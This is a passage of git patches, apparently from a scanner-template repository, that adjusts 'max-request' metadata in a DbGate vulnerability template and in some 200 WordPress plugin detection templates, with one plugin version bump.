+++ b/http/vulnerabilities/dbgate-unauth-rce.yaml
@@ -13,6 +13,7 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
   metadata:
+    max-request: 1
     shodan-query: http.favicon.hash:1198579728
   tags: http,rce,oast,electron,dbgate,oss
 

From 9fc183c243a45fd115c0e5c2818f058e6521291b Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Mon, 18 Sep 2023 04:02:13 +0000
Subject: [PATCH 0414/1090] Auto WordPress Plugins Update [Mon Sep 18 04:02:13
 UTC 2023] :robot:

---
 helpers/wordpress/plugins/so-widgets-bundle.txt                 | 2 +-
 http/technologies/wordpress/plugins/ad-inserter.yaml            | 1 -
 http/technologies/wordpress/plugins/add-to-any.yaml             | 1 -
 http/technologies/wordpress/plugins/admin-menu-editor.yaml      | 1 -
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 -
 http/technologies/wordpress/plugins/akismet.yaml                | 1 -
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml         | 1 -
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml    | 1 -
 .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 -
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml  | 1 -
 http/technologies/wordpress/plugins/amp.yaml                    | 1 -
 http/technologies/wordpress/plugins/antispam-bee.yaml           | 1 -
 http/technologies/wordpress/plugins/astra-sites.yaml            | 1 -
 http/technologies/wordpress/plugins/astra-widgets.yaml          | 1 -
 http/technologies/wordpress/plugins/autoptimize.yaml            | 1 -
 http/technologies/wordpress/plugins/backwpup.yaml               | 1 -
 http/technologies/wordpress/plugins/better-search-replace.yaml  | 1 -
 http/technologies/wordpress/plugins/better-wp-security.yaml     | 1 -
 .../wordpress/plugins/black-studio-tinymce-widget.yaml          | 1 -
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml       | 1 -
 http/technologies/wordpress/plugins/breeze.yaml                 | 1 -
 http/technologies/wordpress/plugins/broken-link-checker.yaml    | 1 -
 .../wordpress/plugins/child-theme-configurator.yaml             | 1 -
 http/technologies/wordpress/plugins/classic-editor.yaml         | 1 -
 http/technologies/wordpress/plugins/classic-widgets.yaml        | 1 -
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml           | 1 -
 http/technologies/wordpress/plugins/cmb2.yaml                   | 1 -
 http/technologies/wordpress/plugins/coblocks.yaml               | 1 -
 http/technologies/wordpress/plugins/code-snippets.yaml          | 1 -
 http/technologies/wordpress/plugins/coming-soon.yaml            | 1 -
 http/technologies/wordpress/plugins/complianz-gdpr.yaml         | 1 -
 .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 -
 http/technologies/wordpress/plugins/contact-form-7.yaml         | 1 -
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml     | 1 -
 http/technologies/wordpress/plugins/cookie-law-info.yaml        | 1 -
 http/technologies/wordpress/plugins/cookie-notice.yaml          | 1 -
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml     | 1 -
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml    | 1 -
 http/technologies/wordpress/plugins/custom-css-js.yaml          | 1 -
 http/technologies/wordpress/plugins/custom-fonts.yaml           | 1 -
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml    | 1 -
 http/technologies/wordpress/plugins/disable-comments.yaml       | 1 -
 http/technologies/wordpress/plugins/disable-gutenberg.yaml      | 1 -
 http/technologies/wordpress/plugins/duplicate-page.yaml         | 1 -
 http/technologies/wordpress/plugins/duplicate-post.yaml         | 1 -
 http/technologies/wordpress/plugins/duplicator.yaml             | 1 -
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml      | 1 -
 http/technologies/wordpress/plugins/easy-fancybox.yaml          | 1 -
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 -
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml           | 1 -
 http/technologies/wordpress/plugins/elementor.yaml              | 1 -
 http/technologies/wordpress/plugins/elementskit-lite.yaml       | 1 -
 http/technologies/wordpress/plugins/enable-media-replace.yaml   | 1 -
 http/technologies/wordpress/plugins/envato-elements.yaml        | 1 -
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml  | 1 -
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml   | 1 -
 .../wordpress/plugins/facebook-for-woocommerce.yaml             | 1 -
 http/technologies/wordpress/plugins/fast-indexing-api.yaml      | 1 -
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml      | 1 -
 http/technologies/wordpress/plugins/flamingo.yaml               | 1 -
 http/technologies/wordpress/plugins/fluentform.yaml             | 1 -
 http/technologies/wordpress/plugins/font-awesome.yaml           | 1 -
 .../wordpress/plugins/force-regenerate-thumbnails.yaml          | 1 -
 http/technologies/wordpress/plugins/formidable.yaml             | 1 -
 http/technologies/wordpress/plugins/forminator.yaml             | 1 -
 http/technologies/wordpress/plugins/ga-google-analytics.yaml    | 1 -
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 -
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml    | 1 -
 .../wordpress/plugins/google-analytics-for-wordpress.yaml       | 1 -
 .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 -
 http/technologies/wordpress/plugins/google-site-kit.yaml        | 1 -
 .../wordpress/plugins/google-sitemap-generator.yaml             | 1 -
 http/technologies/wordpress/plugins/gtranslate.yaml             | 1 -
 http/technologies/wordpress/plugins/gutenberg.yaml              | 1 -
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 -
 .../wordpress/plugins/header-footer-code-manager.yaml           | 1 -
 .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 -
 http/technologies/wordpress/plugins/header-footer.yaml          | 1 -
 http/technologies/wordpress/plugins/health-check.yaml           | 1 -
 http/technologies/wordpress/plugins/hello-dolly.yaml            | 1 -
 http/technologies/wordpress/plugins/host-webfonts-local.yaml    | 1 -
 http/technologies/wordpress/plugins/imagify.yaml                | 1 -
 http/technologies/wordpress/plugins/imsanity.yaml               | 1 -
 .../wordpress/plugins/insert-headers-and-footers.yaml           | 1 -
 http/technologies/wordpress/plugins/instagram-feed.yaml         | 1 -
 .../wordpress/plugins/intuitive-custom-post-order.yaml          | 1 -
 http/technologies/wordpress/plugins/iwp-client.yaml             | 1 -
 http/technologies/wordpress/plugins/jetpack-boost.yaml          | 1 -
 http/technologies/wordpress/plugins/jetpack.yaml                | 1 -
 http/technologies/wordpress/plugins/kadence-blocks.yaml         | 1 -
 http/technologies/wordpress/plugins/kirki.yaml                  | 1 -
 http/technologies/wordpress/plugins/leadin.yaml                 | 1 -
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml        | 1 -
 http/technologies/wordpress/plugins/limit-login-attempts.yaml   | 1 -
 http/technologies/wordpress/plugins/litespeed-cache.yaml        | 1 -
 http/technologies/wordpress/plugins/loco-translate.yaml         | 1 -
 http/technologies/wordpress/plugins/loginizer.yaml              | 1 -
 http/technologies/wordpress/plugins/loginpress.yaml             | 1 -
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml       | 1 -
 http/technologies/wordpress/plugins/mailpoet.yaml               | 1 -
 http/technologies/wordpress/plugins/maintenance.yaml            | 1 -
 http/technologies/wordpress/plugins/mainwp-child.yaml           | 1 -
 http/technologies/wordpress/plugins/malcare-security.yaml       | 1 -
 http/technologies/wordpress/plugins/megamenu.yaml               | 1 -
 http/technologies/wordpress/plugins/members.yaml                | 1 -
 http/technologies/wordpress/plugins/meta-box.yaml               | 1 -
 http/technologies/wordpress/plugins/ml-slider.yaml              | 1 -
 http/technologies/wordpress/plugins/newsletter.yaml             | 1 -
 .../wordpress/plugins/nextend-facebook-connect.yaml             | 1 -
 http/technologies/wordpress/plugins/nextgen-gallery.yaml        | 1 -
 http/technologies/wordpress/plugins/ninja-forms.yaml            | 1 -
 http/technologies/wordpress/plugins/ocean-extra.yaml            | 1 -
 .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 -
 http/technologies/wordpress/plugins/one-click-demo-import.yaml  | 1 -
 http/technologies/wordpress/plugins/optinmonster.yaml           | 1 -
 http/technologies/wordpress/plugins/otter-blocks.yaml           | 1 -
 http/technologies/wordpress/plugins/password-protected.yaml     | 1 -
 http/technologies/wordpress/plugins/pdf-embedder.yaml           | 1 -
 .../wordpress/plugins/pinterest-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/pixelyoursite.yaml          | 1 -
 http/technologies/wordpress/plugins/polylang.yaml               | 1 -
 http/technologies/wordpress/plugins/popup-builder.yaml          | 1 -
 http/technologies/wordpress/plugins/popup-maker.yaml            | 1 -
 http/technologies/wordpress/plugins/post-smtp.yaml              | 1 -
 http/technologies/wordpress/plugins/post-types-order.yaml       | 1 -
 .../wordpress/plugins/premium-addons-for-elementor.yaml         | 1 -
 http/technologies/wordpress/plugins/pretty-link.yaml            | 1 -
 http/technologies/wordpress/plugins/really-simple-captcha.yaml  | 1 -
 http/technologies/wordpress/plugins/really-simple-ssl.yaml      | 1 -
 http/technologies/wordpress/plugins/redirection.yaml            | 1 -
 http/technologies/wordpress/plugins/redux-framework.yaml        | 1 -
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml  | 1 -
 http/technologies/wordpress/plugins/safe-svg.yaml               | 1 -
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml       | 1 -
 http/technologies/wordpress/plugins/sg-cachepress.yaml          | 1 -
 http/technologies/wordpress/plugins/sg-security.yaml            | 1 -
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml    | 1 -
 .../wordpress/plugins/shortpixel-image-optimiser.yaml           | 1 -
 .../wordpress/plugins/simple-custom-post-order.yaml             | 1 -
 http/technologies/wordpress/plugins/siteguard.yaml              | 1 -
 http/technologies/wordpress/plugins/siteorigin-panels.yaml      | 1 -
 http/technologies/wordpress/plugins/smart-slider-3.yaml         | 1 -
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml      | 1 -
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml  | 1 -
 http/technologies/wordpress/plugins/sucuri-scanner.yaml         | 1 -
 http/technologies/wordpress/plugins/svg-support.yaml            | 1 -
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 -
 http/technologies/wordpress/plugins/tablepress.yaml             | 1 -
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml   | 1 -
 http/technologies/wordpress/plugins/the-events-calendar.yaml    | 1 -
 http/technologies/wordpress/plugins/themeisle-companion.yaml    | 1 -
 http/technologies/wordpress/plugins/tinymce-advanced.yaml       | 1 -
 .../wordpress/plugins/translatepress-multilingual.yaml          | 1 -
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml        | 1 -
 .../technologies/wordpress/plugins/under-construction-page.yaml | 1 -
 http/technologies/wordpress/plugins/updraftplus.yaml            | 1 -
 http/technologies/wordpress/plugins/use-any-font.yaml           | 1 -
 http/technologies/wordpress/plugins/user-role-editor.yaml       | 1 -
 .../wordpress/plugins/velvet-blues-update-urls.yaml             | 1 -
 http/technologies/wordpress/plugins/w3-total-cache.yaml         | 1 -
 .../wordpress/plugins/webp-converter-for-media.yaml             | 1 -
 http/technologies/wordpress/plugins/webp-express.yaml           | 1 -
 .../wordpress/plugins/widget-importer-exporter.yaml             | 1 -
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml        | 1 -
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml        | 1 -
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 -
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml    | 1 -
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml           | 1 -
 http/technologies/wordpress/plugins/woocommerce-payments.yaml   | 1 -
 .../wordpress/plugins/woocommerce-paypal-payments.yaml          | 1 -
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml         | 1 -
 http/technologies/wordpress/plugins/woocommerce-services.yaml   | 1 -
 http/technologies/wordpress/plugins/woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/wordfence.yaml              | 1 -
 http/technologies/wordpress/plugins/wordpress-importer.yaml     | 1 -
 http/technologies/wordpress/plugins/wordpress-seo.yaml          | 1 -
 http/technologies/wordpress/plugins/worker.yaml                 | 1 -
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml       | 1 -
 http/technologies/wordpress/plugins/wp-file-manager.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-google-maps.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml    | 1 -
 http/technologies/wordpress/plugins/wp-migrate-db.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml     | 1 -
 http/technologies/wordpress/plugins/wp-optimize.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-pagenavi.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-reset.yaml               | 1 -
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-rollback.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-smushit.yaml             | 1 -
 http/technologies/wordpress/plugins/wp-statistics.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-super-cache.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-user-avatar.yaml         | 1 -
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml        | 1 -
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml         | 1 -
 http/technologies/wordpress/plugins/wpforms-lite.yaml           | 1 -
 http/technologies/wordpress/plugins/wps-hide-login.yaml         | 1 -
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml  | 1 -
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml            | 1 -
 201 files changed, 1 insertion(+), 201 deletions(-)

diff --git a/helpers/wordpress/plugins/so-widgets-bundle.txt b/helpers/wordpress/plugins/so-widgets-bundle.txt
index 4152637441..0704e8968e 100644
--- a/helpers/wordpress/plugins/so-widgets-bundle.txt
+++ b/helpers/wordpress/plugins/so-widgets-bundle.txt
@@ -1 +1 @@
-1.54.0
\ No newline at end of file
+1.55.0
\ No newline at end of file
diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index ebb5ba1042..7cbd1855ae 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
-    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index fddfbf3118..8d579ff23d 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
-    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 7a6e8a76ec..4a6d8b7bbe 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
-    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index 940c0e614c..e4eb308d39 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
-    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index ac77f4e5f5..f68ad2a6bf 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
-    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 90aa5881fd..10f104f2c7 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
-    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 1bf337da6c..8addc28ded 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 7cec152555..2e579621ac 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 8a4b6133cd..41e297ffeb 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index cfa2e3d080..0dd8686ec3 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
-    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index a92d9bde4e..359671f3bd 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
-    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 59144c7dd5..116e0c420a 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
-    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index df06ba2f35..dc4703ef8d 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 2a79d529cc..1426ac3ef2 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
-    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 556a113acc..78d1651ff4 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
-    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index 58d9a9d738..f7219b373d 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
-    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index 6c9c485079..f688a68f72 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
-    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 7631e87d78..00e95c4263 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
-    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index c7daa26ac6..212b2b13c4 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
-    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 68767e4dce..6318392c5c 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
-    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index 073618936d..e1a2a186e0 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
-    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 6aabc19e9f..23614882a7 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
-    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index ac80e4f31b..85965337cb 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
-    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 15d7a24755..33d903a1b4 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 40ccc15b27..3c6f8f287b 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
-    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index 1fad3cee08..c3b630cde2 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
-    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index ebe4ee41a7..5c8ce709b6 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
-    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index 5c32110e0e..aea47b9e84 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
